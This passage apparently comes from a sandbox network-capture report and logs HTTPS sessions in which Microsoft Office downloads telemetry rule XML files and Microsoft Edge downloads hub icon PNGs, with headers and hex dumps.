                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                68192.168.2.54984313.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 479
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 18fe904c-c01e-00a1-4257-277e4a000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210231Z-16849878b78sx229w7g7at4nkg00000003qg00000000vgah
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                69192.168.2.54984613.107.246.574436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC438OUTGET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                Content-Length: 1579
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT
                                                                                                                                                                                                                                                                                                                                ETag: 0x8DBDCB5DE99522A
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 3e6e2bdc-101e-003c-567c-29dcdc000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210231Z-15b8d89586f5s5nz3ffrgxn5ac000000067000000000c7bn
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC1579INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29
                                                                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                70192.168.2.54984513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 9e4d4e08-401e-0047-1d64-278597000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210231Z-16849878b78j5kdg3dndgqw0vg000000076000000000und1
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:31 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                71192.168.2.54985013.107.246.574436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC431OUTGET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                Content-Length: 1966
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT
                                                                                                                                                                                                                                                                                                                                ETag: 0x8DBDCB5EC122A94
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: b003c4e3-a01e-0061-6990-282cd8000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-16849878b78qfbkc5yywmsbg0c000000057000000000fwyf
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC1966INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc
                                                                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNnt*w<T:A*-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                72192.168.2.54984913.107.246.574436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC433OUTGET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                Content-Length: 1751
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT
                                                                                                                                                                                                                                                                                                                                ETag: 0x8DBCEA8D5AACC85
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 28027cef-b01e-003a-3dd5-282ba4000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-16849878b7867ttgfbpnfxt44s00000005gg000000003585
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC1751INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7
                                                                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                73192.168.2.54984713.107.246.574436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC433OUTGET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                Content-Length: 1427
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT
                                                                                                                                                                                                                                                                                                                                ETag: 0x8DBDCB5EF021F8E
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 5984f239-a01e-0048-0690-285a9a000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-16849878b7867ttgfbpnfxt44s00000005e000000000d8v1
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC1427INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89
                                                                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                74192.168.2.54984813.107.246.574436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC430OUTGET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                Content-Length: 2008
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT
                                                                                                                                                                                                                                                                                                                                ETag: 0x8DBC9B5C0C17219
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 479a53aa-f01e-001f-392b-29b317000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210232Z-15b8d89586fmc8ck21zz2rtg1w00000002rg00000000f1ah
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L2_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC2008INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                75192.168.2.54985113.107.246.574436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC422OUTGET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
